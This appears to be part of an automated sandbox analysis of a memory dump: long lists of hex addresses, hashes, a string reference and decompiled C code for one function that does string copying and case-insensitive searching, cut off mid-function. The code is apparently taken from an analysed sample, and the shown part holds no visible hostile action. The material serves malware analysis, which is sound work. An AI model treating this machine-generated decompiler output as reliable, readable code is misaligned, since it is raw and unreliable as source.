0x003ba996
0x003ba999
0x003ba99c
0x003ba99e
0x003ba9a0
0x00000000
0x00000000
0x003ba9a8
0x003ba9ab
0x003ba9af
0x003ba9b7
0x003ba9bf
0x003ba9c3
0x003ba9c7
0x003ba9cb
0x003ba9cf
0x003ba9d3
0x003ba9d7
0x003ba9e7
0x003ba9e7
0x003ba9e7
0x003ba9e9
0x003ba9eb
0x00000000
0x00000000
0x003ba9ed
0x003ba9ef
0x003ba9f1
0x003baa5a
0x003baa5a
0x003baa5e
0x003baa62
0x003baa64
0x00000000
0x00000000
0x003baa6a
0x003baa6b
0x003baa70
0x00000000
0x00000000
0x003baa72
0x003baa7a
0x003baa7a
0x003baa7f
0x003baa7f
0x003baa82
0x003baa82
0x003baa84
0x003baa88
0x003baa8c
0x003baa93
0x003baa99
0x003baa9f
0x003baaa2
0x003baaa8
0x003baaab
0x003baaae
0x00000000
0x00000000
0x003baaba
0x003baabc
0x003baac4
0x003baac4
0x003baac8
0x003baaca
0x003baacd
0x003baacf
0x00000000
0x00000000
0x003baad5
0x003baad5
0x003baad7
0x003baad9
0x003bab3a
0x003bab3a
0x003bab3d
0x003bab5f
0x003bab6b
0x003bab6b
0x003bab71
0x003bab71
0x003bab76
0x003bab7a
0x003bab7e
0x003bab80
0x00000000
0x00000000
0x003bab86
0x003bab89
0x003bab8b
0x00000000
0x00000000
0x003bab8d
0x003bab8f
0x003bab95
0x003baba8
0x003baba8
0x003babad
0x003babb2
0x003babb4
0x003babb6
0x003babb8
0x003babbe
0x003babbe
0x003babc0
0x003babc0
0x003babc2
0x003babc5
0x003babc8
0x003babca
0x003bad2f
0x003bad2f
0x003bad39
0x003bad3b
0x003bad3e
0x003bad40
0x003bad42
0x003bad7f
0x00000000
0x003bad7f
0x003bad44
0x003bad46
0x003bad6f
0x003bad6f
0x003bad71
0x003bad72
0x003bad77
0x00000000
0x003bad77
0x003bad48
0x003bad4b
0x003bad4e
0x003bad50
0x00000000
0x00000000
0x003bad52
0x003bad54
0x003bad54
0x003bad55
0x003bad5a
0x003bad5f
0x003bad61
0x00000000
0x00000000
0x003bad63
0x003bad67
0x003bad6b
0x003bad6d
0x00000000
0x00000000
0x00000000
0x003bad6d
0x00000000
0x003bad54
0x003babd3
0x003babd5
0x00000000
0x00000000
0x003babdb
0x003babdd
0x003bac4d
0x003bac52
0x003bac52
0x003bac55
0x003bac58
0x003bac5b
0x003bac5d
0x003bac70
0x003bac73
0x003bac73
0x003bac79
0x003bac81
0x003bac81
0x003bac81
0x003bac82
0x003bac89
0x003bac93
0x003bac97
0x003bac98
0x003bac9c
0x003baca1
0x003baca5
0x003baca8
0x003bacaa
0x003bacac
0x003bacfc
0x00000000
0x003bacae
0x003bacae
0x003bacb0
0x003bacdf
0x003bacdf
0x003bace1
0x003bace2
0x003bace6
0x003bacea
0x003bacef
0x003bacf3
0x003bacf7
0x003bacff
0x003bad03
0x003bad06
0x003bad08
0x003bad08
0x003bad0a
0x00000000
0x00000000
0x003bad10
0x003bad1a
0x003bad1a
0x003bad1d
0x003bad1e
0x003bad21
0x003bad23
0x00000000
0x00000000
0x003bad25
0x003bad27
0x003bad8e
0x003bad90
0x00000000
0x003bad90
0x003bad29
0x003bad29
0x003bad2b
0x003bad99
0x00000000
0x003bad99
0x003bad14
0x003bad17
0x003bad17
0x003bad17
0x003bad1a
0x003bacb2
0x003bacb5
0x003bacb8
0x003bacba
0x003bacbd
0x00000000
0x00000000
0x00000000
0x00000000
0x003bacbf
0x003bacbf
0x003bacbf
0x003bacc0
0x003bacc5
0x003bacca
0x003baccc
0x00000000
0x00000000
0x003bacce
0x003bacd2
0x003bacd6
0x003bacd8
0x00000000
0x00000000
0x00000000
0x003bacd8
0x003bacda
0x003bacdd
0x003bacdd
0x00000000
0x003bacdd
0x003bacac
0x003bac5f
0x00000000
0x003bac5f
0x003babe1
0x003babe1
0x003babe4
0x003bac01
0x003bac0d
0x003bac0d
0x003bac13
0x003bac13
0x003bac18
0x003bac1c
0x003bac20
0x003bac22
0x00000000
0x00000000
0x003bac28
0x003bac2b
0x003bac2d
0x00000000
0x00000000
0x003bac2f
0x003bac35
0x003bac48
0x003bac48
0x00000000
0x00000000
0x00000000
0x00000000
0x003bac37
0x003bac37
0x003bac3b
0x003bac3d
0x00000000
0x00000000
0x003bac3f
0x003bac40
0x003bac46
0x00000000
0x00000000
0x00000000
0x003bac46
0x00000000
0x003bac37
0x003badbf
0x003badc4
0x00000000
0x003badc4
0x003babe6
0x003babe8
0x003babeb
0x00000000
0x00000000
0x003babf2
0x003babf2
0x003babf4
0x003babf4
0x003babf8
0x003babfa
0x00000000
0x00000000
0x003babfc
0x003babfd
0x003babff
0x00000000
0x00000000
0x00000000
0x003babff
0x00000000
0x003babf4
0x003babba
0x003babbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bab97
0x003bab97
0x003bab9b
0x003bab9d
0x00000000
0x00000000
0x003bab9f
0x003baba0
0x003baba6
0x00000000
0x00000000
0x00000000
0x003baba6
0x00000000
0x003bab97
0x003badcb
0x003badcd
0x003badcf
0x003badd4
0x00000000
0x003badd4
0x003bab3f
0x003bab41
0x003bab43
0x00000000
0x00000000
0x003bab4a
0x003bab4a
0x003bab4c
0x003bab50
0x003bab52
0x00000000
0x00000000
0x003bab58
0x003bab59
0x003bab5b
0x00000000
0x00000000
0x003bab5d
0x003bab5d
0x00000000
0x003bab5d
0x003bad87
0x00000000
0x003bad87
0x003baadb
0x003baae0
0x003baae2
0x003baaea
0x003baaec
0x003baaef
0x003baaf1
0x003baaf3
0x003bab30
0x00000000
0x003bab30
0x003baaf5
0x003baaf7
0x003bab20
0x003bab20
0x003bab22
0x003bab23
0x003bab28
0x00000000
0x003bab28
0x003baaf9
0x003baafc
0x003baaff
0x003bab01
0x00000000
0x00000000
0x003bab03
0x003bab05
0x003bab05
0x003bab06
0x003bab0b
0x003bab10
0x003bab12
0x00000000
0x00000000
0x003bab14
0x003bab18
0x003bab1c
0x003bab1e
0x00000000
0x00000000
0x00000000
0x003bab1e
0x00000000
0x003bab05
0x003baabe
0x003baabf
0x003baac2
0x00000000
0x00000000
0x00000000
0x003baac2
0x003bade9
0x003bade9
0x003badec
0x00000000
0x00000000
0x003badf6
0x003badf8
0x00000000
0x00000000
0x003badfe
0x003bae02
0x003bae02
0x003bae04
0x003bae04
0x003bae0e
0x003bae11
0x003bae17
0x003bae21
0x003bae24
0x003bae27
0x00000000
0x00000000
0x003bae31
0x003bae33
0x00000000
0x00000000
0x00000000
0x003bae35
0x003ba9db
0x003ba9df
0x003ba9e3
0x00000000
0x003ba9e3
0x003bae3a
0x003badac
0x003badac
0x003badae
0x00000000
0x00000000
0x003badb4
0x00000000
0x00000000
0x00000000
0x003badba
0x003ba9f3
0x003ba9f7
0x003ba9f9
0x003ba9fd
0x003ba9ff
0x00000000
0x00000000
0x003baa05
0x003baa06
0x003baa08
0x00000000
0x00000000
0x003baa0a
0x003baa12
0x00000000
0x003baa12
0x003bada0
0x00000000
0x003baa16
0x003baa22
0x003baa26
0x003baa26
0x003baa2b
0x003baa2b
0x003baa30
0x003baa34
0x003baa38
0x003baa3a
0x00000000
0x00000000
0x003baa40
0x003baa43
0x003baa45
0x00000000
0x00000000
0x003baa47
0x003baa53
0x003baa58
0x00000000
0x00000000
0x00000000
0x003baa58
0x003bae49
0x003bae4e
0x003bae52
0x00000000
0x003bae58
0x003ba9e7
0x00000000
0x003ba849
0x003ba7d7
0x003ba7da
0x003ba7dd
0x003ba7df
0x00000000
0x00000000
0x003ba7e1
0x003ba7e4
0x003ba7e6
0x003ba7e6
0x003ba7e7
0x003ba7ec
0x003ba7f1
0x003ba7f3
0x00000000
0x00000000
0x003ba7f5
0x003ba7f9
0x003ba7fd
0x003ba7ff
0x00000000
0x00000000
0x00000000
0x003ba7ff
0x003ba801
0x00000000
0x003ba801
0x003ba7d1
0x003ba77f
0x00000000
0x003ba77f
0x003ba6f1
0x003ba6f1
0x003ba6f4
0x003ba714
0x003ba718
0x003ba724
0x003ba724
0x003ba72a
0x003ba72a
0x003ba72f
0x003ba733
0x003ba737
0x003ba739
0x00000000
0x00000000
0x003ba73f
0x003ba742
0x003ba744
0x00000000
0x00000000
0x003ba746
0x003ba74c
0x003ba763
0x003ba763
0x003ba768
0x00000000
0x00000000
0x00000000
0x00000000
0x003ba74e
0x003ba74e
0x003ba752
0x003ba754
0x00000000
0x00000000
0x003ba75a
0x003ba75b
0x003ba761
0x00000000
0x00000000
0x00000000
0x003ba761
0x003ba977
0x003ba977
0x003ba97a
0x003ba988
0x003ba97c
0x003ba97c
0x003ba97f
0x003ba97f
0x00000000
0x003ba97a
0x003bae61
0x003bae66
0x00000000
0x003bae66
0x003ba6f6
0x003ba6f8
0x003ba6fa
0x00000000
0x00000000
0x003ba701
0x003ba701
0x003ba703
0x003ba703
0x003ba707
0x003ba709
0x00000000
0x00000000
0x003ba70f
0x003ba710
0x003ba712
0x00000000
0x00000000
0x00000000
0x003ba712
0x00000000
0x003ba703
0x003ba6de
0x00000000
0x003ba6de
0x003ba691
0x003ba6ba
0x003ba6ba
0x003ba6bc
0x003ba6bd
0x003ba6c2
0x00000000
0x003ba6c2
0x003ba693
0x003ba696
0x003ba69b
0x00000000
0x00000000
0x003ba69d
0x003ba69f
0x003ba69f
0x003ba6a0
0x003ba6a5
0x003ba6ac
0x00000000
0x00000000
0x003ba6ae
0x003ba6b2
0x003ba6b8
0x00000000
0x00000000
0x00000000
0x003ba6b8
0x00000000

Strings

@, xrefs: 003BA6CE

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ae6b3e210800e4c3dadabf5ebb6fe57ad04fee7b8c08fcbeb00b4035cedc0044
Instruction ID: 0c94a8ffa2bcef69dc25e3ec323721f6c26d1966ee5c6facbcf9df80b942ab49
Opcode Fuzzy Hash: ae6b3e210800e4c3dadabf5ebb6fe57ad04fee7b8c08fcbeb00b4035cedc0044
Instruction Fuzzy Hash: A9322B71A04F1287C7268F19C45027AB3E2BFC4718B65862DEAA58BF94EB35DC42D343

Uniqueness

Uniqueness Score: -1.00%

Function 003C1EB0, Relevance: 1.9, Strings: 1, Instructions: 682
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E003C1EB0(intOrPtr* __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t210;
				signed int _t211;
				signed int* _t217;
				char* _t221;
				signed int* _t222;
				intOrPtr _t227;
				signed int _t232;
				signed int _t235;
				signed int _t239;
				signed int _t241;
				signed int* _t247;
				signed int _t248;
				signed int _t250;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t265;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				char _t276;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				signed int _t283;
				intOrPtr* _t286;
				signed int _t287;
				signed int _t291;
				signed int _t293;
				signed int _t294;
				void* _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t303;
				char _t304;
				char _t305;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				void* _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				intOrPtr* _t325;
				char _t326;
				signed int _t327;
				intOrPtr* _t329;
				signed int _t330;
				signed int _t331;
				void* _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				void* _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				void* _t343;
				intOrPtr* _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				char _t357;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				char _t368;
				char _t369;
				char _t370;
				signed int _t372;
				unsigned int _t377;
				signed int _t379;
				intOrPtr _t381;
				signed int _t385;
				signed int _t386;
				signed char* _t392;
				signed int _t393;
				signed int _t395;
				signed int _t401;
				signed int _t402;
				unsigned int _t408;
				signed int _t410;
				void* _t411;
				signed int _t417;
				signed int _t421;
				signed int _t427;
				signed int _t428;
				void* _t431;

				_v56 = 0;
				_t286 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t372 = E003B1030();
				_t431 = (_t428 & 0xfffffff0) - 0x34 + 4;
				_t210 = _v56;
				if(_t210 == 0) {
					 *_t372 = 0;
				} else {
					if(_t372 != 0) {
						_t368 =  *_t210;
						 *_t372 = _t368;
						if(_t368 != 0) {
							_t319 = 0;
							while(1) {
								_t319 = _t319 + 1;
								_t369 =  *((char*)(_t210 + _t319 * 2 - 1));
								 *((char*)(_t372 + _t319 * 2 - 1)) = _t369;
								if(_t369 == 0) {
									goto L6;
								}
								_t370 =  *((char*)(_t210 + _t319 * 2));
								 *((char*)(_t372 + _t319 * 2)) = _t370;
								if(_t370 != 0) {
									continue;
								}
								goto L6;
							}
						}
					}
					L6:
					_push(1);
					_push(_t210);
					E003B10B0();
					_t431 = _t431 + 8;
				}
				_t211 = _a8;
				_v52 = 0x40;
				_v56 = _t372;
				if(_t211 != 0) {
					__eflags = _t372;
					if(_t372 == 0) {
						_t302 = 0x40;
						_t401 = 0;
					} else {
						_t366 = _t372 & 0x0000000f;
						__eflags = _t366;
						if(_t366 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t427 =  ~( ~_t366 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t427;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t211;
								if(_t211 != 0) {
									break;
								}
								_t366 = _t366 + 0x10;
								__eflags = _t366 - _t427;
								if(_t366 < _t427) {
									continue;
								} else {
									__eflags = _t427 - 0x7fffffff;
									if(_t427 >= 0x7fffffff) {
										L21:
										_t302 = 0x40;
										_t401 = 0x7fffffff;
									} else {
										while(1) {
											__eflags =  *((char*)(_t427 + _t372));
											if( *((char*)(_t427 + _t372)) == 0) {
												goto L174;
											}
											_t427 = _t427 + 1;
											__eflags = _t427 - 0x7fffffff;
											if(_t427 < 0x7fffffff) {
												continue;
											} else {
												goto L21;
											}
											goto L22;
										}
										goto L174;
									}
								}
								goto L22;
							}
							asm("bsf esi, eax");
							_t401 = _t427 + _t366;
							goto L174;
						} else {
							_t401 = 0;
							_t366 =  ~_t366 + 0x10;
							__eflags = _t366;
							while(1) {
								__eflags =  *((char*)(_t401 + _t372));
								if( *((char*)(_t401 + _t372)) == 0) {
									break;
								}
								_t401 = _t401 + 1;
								__eflags = _t401 - _t366;
								if(_t401 < _t366) {
									continue;
								} else {
									goto L15;
								}
								goto L22;
							}
							L174:
							__eflags = _t401 - 0xfffffffe;
							if(_t401 != 0xfffffffe) {
								_t302 = 0x40;
							} else {
								 *_t372 = 0;
								_t302 = _v52;
							}
						}
					}
					L22:
					_t20 = _t401 + 2; // 0x80000001
					_t320 = _t20;
					__eflags = _t320 - 0x40;
					_t321 =  <=  ? 0x40 : _t320;
					__eflags = _t302 - _t321;
					if(_t302 < _t321) {
						_t377 = (_t321 >> 5 >> 0x1a) + _t321 >> 6;
						_t322 = _t321 & 0x8000003f;
						__eflags = _t322;
						if(_t322 < 0) {
							_t322 = (_t322 - 0x00000001 | 0xffffffc0) + 1;
							__eflags = _t322;
						}
						__eflags = _t322;
						_t379 = _t377 + (0 | _t322 > 0x00000000) << 6;
						_push(_t379);
						_t303 = E003B1030();
						_t431 = _t431 + 4;
						_t323 = _v56;
						__eflags = _t323;
						if(_t323 == 0) {
							 *_t303 = 0;
						} else {
							__eflags = _t303;
							if(_t303 != 0) {
								_t282 =  *_t323;
								 *_t303 = _t282;
								__eflags = _t282;
								if(_t282 != 0) {
									_v60 = _t379;
									_t283 = 0;
									__eflags = 0;
									_v64 = _t401;
									_v68 = _t286;
									while(1) {
										_t283 = _t283 + 1;
										_t299 =  *((char*)(_t323 + _t283 * 2 - 1));
										 *(_t303 + _t283 * 2 - 1) = _t299;
										__eflags = _t299;
										if(_t299 == 0) {
											break;
										}
										_t300 =  *((char*)(_t323 + _t283 * 2));
										 *(_t303 + _t283 * 2) = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											continue;
										}
										break;
									}
									_t379 = _v60;
									_t401 = _v64;
									_t286 = _v68;
								}
							}
							_push(1);
							_push(_t323);
							_v68 = _t303;
							E003B10B0();
							_t303 = _v68;
							_t431 = _t431 + 8;
						}
						_v52 = _t379;
						_v56 = _t303;
					} else {
						_t303 = _v56;
					}
					 *((char*)(_t303 + _t401)) = _a8;
					_t217 =  &_v56;
					 *((char*)(_t401 +  *_t217 + 1)) = 0;
				} else {
					_t217 =  &_v56;
				}
				_t402 =  *_t217;
				if(_t402 == 0) {
					L39:
					_t325 = _a4;
					_push(0x40);
					 *_t325 = 0;
					 *((intOrPtr*)(_t325 + 4)) = 0;
					_t287 = E003B1030();
					_t431 = _t431 + 4;
					_t221 =  *_a4;
					if(_t221 == 0) {
						 *_t287 = 0;
					} else {
						if(_t287 != 0) {
							_t326 =  *_t221;
							 *_t287 = _t326;
							if(_t326 != 0) {
								_t327 = 0;
								while(1) {
									_t327 = _t327 + 1;
									_t304 =  *((char*)(_t221 + _t327 * 2 - 1));
									 *((char*)(_t287 + _t327 * 2 - 1)) = _t304;
									if(_t304 == 0) {
										goto L45;
									}
									_t305 =  *((char*)(_t221 + _t327 * 2));
									 *((char*)(_t287 + _t327 * 2)) = _t305;
									if(_t305 != 0) {
										continue;
									}
									goto L45;
								}
							}
						}
						L45:
						_push(1);
						_push(_t221);
						E003B10B0();
						_t431 = _t431 + 8;
					}
					goto L124;
				} else {
					_t227 =  *_t402;
					_v40 = _t227;
					if(_t227 != 0) {
						_v64 =  *_t286;
						_t307 = E003C5A90( *_t286, _t402);
						__eflags = _t307;
						if(_t307 == 0) {
							_t329 = _a4;
							_push(0x40);
							 *_t329 = 0;
							 *((intOrPtr*)(_t329 + 4)) = 0;
							_t287 = E003B1030();
							_t431 = _t431 + 4;
							_t232 =  *_a4;
							__eflags = _t232;
							if(_t232 == 0) {
								 *_t287 = 0;
							} else {
								__eflags = _t287;
								if(_t287 != 0) {
									_t330 =  *_t232;
									 *_t287 = _t330;
									__eflags = _t330;
									if(_t330 != 0) {
										_t331 = 0;
										__eflags = 0;
										while(1) {
											_t331 = _t331 + 1;
											_t308 =  *((char*)(_t232 + _t331 * 2 - 1));
											 *(_t287 + _t331 * 2 - 1) = _t308;
											__eflags = _t308;
											if(_t308 == 0) {
												goto L172;
											}
											_t309 =  *((char*)(_t232 + _t331 * 2));
											 *(_t287 + _t331 * 2) = _t309;
											__eflags = _t309;
											if(_t309 != 0) {
												continue;
											}
											goto L172;
										}
									}
								}
								L172:
								_push(1);
								_push(_t232);
								E003B10B0();
								_t431 = _t431 + 8;
							}
							goto L124;
						} else {
							_t381 = _v40;
							_t235 = _t402 & 0x0000000f;
							_v36 = _t235;
							asm("pxor xmm0, xmm0");
							_v20 = _t402;
							_v44 = _t381 - 0x41;
							_v24 =  ~_t235 + 0x10;
							_v48 = _t381 + 0x20;
							_t333 = 0;
							__eflags = 0;
							while(1) {
								L49:
								_t385 = _t307;
								_t291 = _t307 + 1;
								__eflags = _t291;
								if(_t291 == 0) {
									break;
								}
								__eflags =  *(_t307 + 1);
								if( *(_t307 + 1) != 0) {
									__eflags = _v44 - 0x19;
									_t411 = _t333;
									_t268 =  <=  ? _v48 : _v40;
									_t269 =  <=  ? _v48 : _v40;
									_v60 = _t385;
									_v28 =  <=  ? _v48 : _v40;
									while(1) {
										_t411 = _t411 + 1;
										_t291 = _t291 + 1;
										_t392 = _t307 + _t411;
										_v32 = _t392;
										_t393 =  *_t392 & 0x000000ff;
										__eflags =  *((char*)(_t291 - 1)) + 0xffffffbf - 0x19;
										_t394 =  <=  ? _t393 + 0x20 : _t393;
										_t272 =  <=  ? _t393 + 0x20 : _t393;
										__eflags = ( <=  ? _t393 + 0x20 : _t393) - _v28;
										if(( <=  ? _t393 + 0x20 : _t393) == _v28) {
											break;
										}
										__eflags =  *_t291;
										if( *_t291 != 0) {
											continue;
										} else {
											L54:
											_t385 = _v60;
										}
										goto L55;
									}
									_t307 = _v32;
									_t355 = _v36;
									_t273 = _v24;
									do {
										_t395 = _t355;
										__eflags = _t355;
										if(_t355 == 0) {
											L136:
											_v24 = _t273;
											_t417 =  ~( ~_t395 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											__eflags = _t417;
											_t274 = _v20;
											while(1) {
												asm("movdqu xmm1, [eax+edi]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb ebx, xmm1");
												__eflags = _t291;
												if(_t291 != 0) {
													break;
												}
												_t395 = _t395 + 0x10;
												__eflags = _t395 - _t417;
												if(_t395 < _t417) {
													continue;
												} else {
													_v20 = _t274;
													_t275 = _v24;
													__eflags = _t417 - 0x7fffffff;
													if(_t417 >= 0x7fffffff) {
														goto L144;
													} else {
														_t291 = _v20;
														while(1) {
															__eflags =  *((char*)(_t417 + _t291));
															if( *((char*)(_t417 + _t291)) == 0) {
																goto L161;
															}
															_t417 = _t417 + 1;
															__eflags = _t417 - 0x7fffffff;
															if(_t417 < 0x7fffffff) {
																continue;
															} else {
																_v20 = _t291;
																goto L144;
															}
															goto L179;
														}
														goto L161;
													}
												}
												goto L179;
											}
											asm("bsf esi, ebx");
											_v20 = _t274;
											_t417 = _t417 + _t395;
											_t275 = _v24;
											goto L162;
										} else {
											_t291 = _v20;
											_t395 = _t273;
											_t417 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((char*)(_t417 + _t291));
												if( *((char*)(_t417 + _t291)) == 0) {
													break;
												}
												_t417 = _t417 + 1;
												__eflags = _t417 - _t273;
												if(_t417 < _t273) {
													continue;
												} else {
													_v20 = _t291;
													goto L136;
												}
												goto L179;
											}
											L161:
											_v20 = _t291;
											L162:
											__eflags = _t417;
											if(__eflags == 0) {
												L144:
												_t417 = 0x7fffffff;
												goto L145;
											} else {
												if(__eflags > 0) {
													L145:
													_v68 = _t417;
													_t296 = 0;
													__eflags = 0;
													_v36 = _t355;
													_v24 = _t275;
													while(1) {
														_t276 =  *((char*)(_t296 + _t307));
														_t357 =  *((char*)(_t296 + _v20));
														__eflags = _t276 - 0x61 - 0x19;
														_t277 =  <=  ? _t276 - 0x20 : _t276;
														__eflags = _t357 - 0x61 - 0x19;
														_t278 =  <=  ? _t276 - 0x20 : _t276;
														_t358 =  <=  ? _t357 - 0x20 : _t357;
														_t359 =  <=  ? _t357 - 0x20 : _t357;
														__eflags = _t278 - ( <=  ? _t357 - 0x20 : _t357);
														if(__eflags < 0 || __eflags > 0) {
															break;
														}
														__eflags = _t278;
														if(_t278 == 0) {
															L150:
															asm("o16 nop [eax+eax]");
															_t385 = _v60;
															_t333 = 0;
															__eflags = 0;
															goto L151;
														} else {
															_t296 = _t296 + 1;
															__eflags = _t296 - _v68;
															if(_t296 < _v68) {
																continue;
															} else {
																goto L150;
															}
														}
														goto L179;
													}
													_t360 = _v36;
													_t279 = _v24;
													_t421 = _t307 + 1;
													__eflags = _t421;
													if(_t421 == 0) {
														goto L54;
													} else {
														__eflags = _v44 - 0x19;
														_t298 =  <=  ? _v48 : _v40;
														_t291 =  <=  ? _v48 : _v40;
														__eflags =  *(_t307 + 1);
														if( *(_t307 + 1) == 0) {
															goto L54;
														} else {
															_v36 = _t360;
															_v24 = _t279;
															while(1) {
																_t307 = _t307 + 1;
																_t421 = _t421 + 1;
																_t361 =  *_t307 & 0x000000ff;
																__eflags =  *((char*)(_t421 - 1)) + 0xffffffbf - 0x19;
																_t362 =  <=  ? _t361 + 0x20 : _t361;
																__eflags = ( <=  ? _t361 + 0x20 : _t361) - _t291;
																if(( <=  ? _t361 + 0x20 : _t361) == _t291) {
																	goto L159;
																}
																__eflags =  *_t421;
																if( *_t421 != 0) {
																	continue;
																} else {
																	goto L54;
																}
																goto L179;
															}
															goto L159;
														}
													}
												} else {
													_v36 = _t355;
													_t333 = 0;
													_v24 = _t273;
													_t385 = _v60;
													L151:
													__eflags = _t307;
													if(_t307 != 0) {
														goto L49;
													} else {
														goto L55;
													}
												}
											}
										}
										L179:
										L159:
										_t355 = _v36;
										_t273 = _v24;
										__eflags = _t307;
									} while (_t307 != 0);
									goto L54;
								}
								break;
							}
							L55:
							_t386 = _t385 - _v64;
							__eflags = _t386;
							if(_t386 != 0) {
								__eflags = _v64;
								if(_v64 == 0) {
									_t334 = 0;
								} else {
									_t259 = _v64 & 0x0000000f;
									__eflags = _t259;
									if(_t259 == 0) {
										L69:
										_t334 =  ~( ~_t259 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										__eflags = _t334;
										while(1) {
											asm("movdqu xmm1, [ebx+eax]");
											asm("pcmpeqb xmm1, xmm0");
											asm("pmovmskb ecx, xmm1");
											__eflags = _t307;
											if(_t307 != 0) {
												break;
											}
											_t259 = _t259 + 0x10;
											__eflags = _t259 - _t334;
											if(_t259 < _t334) {
												continue;
											} else {
												__eflags = _t334 - 0x7fffffff;
												if(_t334 >= 0x7fffffff) {
													L76:
													_t334 = 0x7fffffff;
												} else {
													_t260 = _v64;
													while(1) {
														__eflags =  *((char*)(_t334 + _t260));
														if( *((char*)(_t334 + _t260)) == 0) {
															goto L77;
														}
														_t334 = _t334 + 1;
														__eflags = _t334 - 0x7fffffff;
														if(_t334 < 0x7fffffff) {
															continue;
														} else {
															goto L76;
														}
														goto L77;
													}
												}
											}
											goto L77;
										}
										asm("bsf edx, ecx");
										_t334 = _t334 + _t259;
									} else {
										_t334 = 0;
										_t307 = _v64;
										_t259 =  ~_t259 + 0x10;
										__eflags = _t259;
										while(1) {
											__eflags =  *((char*)(_t334 + _t307));
											if( *((char*)(_t334 + _t307)) == 0) {
												goto L77;
											}
											_t334 = _t334 + 1;
											__eflags = _t334 - _t259;
											if(_t334 < _t259) {
												continue;
											} else {
												goto L69;
											}
											goto L77;
										}
									}
								}
								L77:
								_t312 = _t334 >> 0x0000001f & _t334;
								_t335 = _t334 - _t312;
								__eflags = _t386;
								if(_t386 < 0) {
									L79:
									_t386 = _t335;
								} else {
									__eflags = _t386 - _t335;
									if(_t386 > _t335) {
										goto L79;
									}
								}
								_t336 = _a4;
								 *_t336 = 0;
								 *((intOrPtr*)(_t336 + 4)) = 0;
								_t293 = _t312 + _v64;
								__eflags = _t293;
								if(_t293 == 0) {
									L116:
									_push(0x40);
									_t287 = E003B1030();
									_t431 = _t431 + 4;
									_t239 =  *_a4;
									__eflags = _t239;
									if(_t239 == 0) {
										 *_t287 = 0;
									} else {
										__eflags = _t287;
										if(_t287 != 0) {
											_t337 =  *_t239;
											 *_t287 = _t337;
											__eflags = _t337;
											if(_t337 != 0) {
												_t338 = 0;
												__eflags = 0;
												while(1) {
													_t338 = _t338 + 1;
													_t313 =  *((char*)(_t239 + _t338 * 2 - 1));
													 *(_t287 + _t338 * 2 - 1) = _t313;
													__eflags = _t313;
													if(_t313 == 0) {
														goto L122;
													}
													_t314 =  *((char*)(_t239 + _t338 * 2));
													 *(_t287 + _t338 * 2) = _t314;
													__eflags = _t314;
													if(_t314 != 0) {
														continue;
													}
													goto L122;
												}
											}
										}
										L122:
										_push(1);
										_push(_t239);
										E003B10B0();
										_t431 = _t431 + 8;
									}
									goto L124;
								} else {
									_t241 = _v64;
									__eflags =  *(_t241 + _t312);
									if( *(_t241 + _t312) == 0) {
										goto L116;
									} else {
										__eflags = _t386;
										if(_t386 == 0) {
											_t254 = _t241 + _t312;
											_v64 = _t254;
											_t255 = _t254 & 0x0000000f;
											__eflags = _t255;
											if(_t255 == 0) {
												L87:
												_t386 =  ~( ~_t255 + 0x0000000f & 0x0000000f) + 0x7fffffff;
												__eflags = _t386;
												while(1) {
													asm("movdqu xmm1, [ecx+eax]");
													asm("pcmpeqb xmm1, xmm0");
													asm("pmovmskb edx, xmm1");
													__eflags = _t336;
													if(_t336 != 0) {
														break;
													}
													_t255 = _t255 + 0x10;
													__eflags = _t255 - _t386;
													if(_t255 < _t386) {
														continue;
													} else {
														__eflags = _t386 - 0x7fffffff;
														if(_t386 >= 0x7fffffff) {
															L94:
															_t386 = 0x7fffffff;
														} else {
															_t256 = _v64;
															while(1) {
																__eflags =  *((char*)(_t386 + _t256));
																if( *((char*)(_t386 + _t256)) == 0) {
																	goto L95;
																}
																_t386 = _t386 + 1;
																__eflags = _t386 - 0x7fffffff;
																if(_t386 < 0x7fffffff) {
																	continue;
																} else {
																	goto L94;
																}
																goto L95;
															}
														}
													}
													goto L95;
												}
												asm("bsf edi, edx");
												_t386 = _t386 + _t255;
											} else {
												_t386 = 0;
												_t336 = _v64;
												_t255 =  ~_t255 + 0x10;
												__eflags = _t255;
												while(1) {
													__eflags =  *((char*)(_t386 + _t336));
													if( *((char*)(_t386 + _t336)) == 0) {
														goto L95;
													}
													_t386 = _t386 + 1;
													__eflags = _t386 - _t255;
													if(_t386 < _t255) {
														continue;
													} else {
														goto L87;
													}
													goto L95;
												}
											}
										}
										L95:
										_t115 = _t386 + 1; // -2147483661
										_t339 = _t115;
										__eflags = _t339 - 0x40;
										_t340 =  <=  ? 0x40 : _t339;
										__eflags = _t340;
										if(_t340 > 0) {
											_t408 = (_t340 >> 5 >> 0x1a) + _t340 >> 6;
